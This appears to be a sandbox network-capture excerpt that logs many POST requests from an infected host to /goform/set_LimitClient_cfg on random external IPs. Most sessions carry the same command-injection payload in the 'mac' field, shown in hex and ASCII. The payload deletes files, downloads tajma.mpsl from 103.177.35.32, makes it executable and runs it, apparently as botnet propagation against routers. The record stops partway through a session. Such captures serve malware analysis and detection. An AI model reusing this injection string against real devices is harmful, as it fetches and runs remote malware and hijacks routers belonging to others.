                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2723192.168.2.233700060.153.102.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476771116 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2724192.168.2.2337348137.171.158.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476788044 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2725192.168.2.2346572156.21.149.998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476805925 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2726192.168.2.235541472.252.31.108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476830959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2727192.168.2.2344156179.221.67.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476845980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2728192.168.2.2357744192.206.55.2278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476859093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2729192.168.2.2357116206.119.171.1858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476883888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2730192.168.2.2334938182.140.201.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.476902008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2731192.168.2.235697451.48.95.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477193117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2732192.168.2.2334038152.21.167.908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477226019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2733192.168.2.2342032196.73.106.808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477252007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2734192.168.2.23579325.216.70.1238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477281094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2735192.168.2.2359576145.46.95.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477307081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2736192.168.2.2358722128.226.238.1238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477324009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2737192.168.2.2336168150.184.28.1038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477369070 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2738192.168.2.2337910181.164.237.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477404118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2739192.168.2.233369236.166.60.2078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477422953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2740192.168.2.235521213.195.112.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477425098 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2741192.168.2.2352426153.151.191.1038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477437973 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2742192.168.2.2352776120.201.187.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477483034 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2743192.168.2.2341072164.161.52.818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477505922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2744192.168.2.2345108145.235.249.878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477520943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2745192.168.2.2357408223.148.241.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.477528095 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
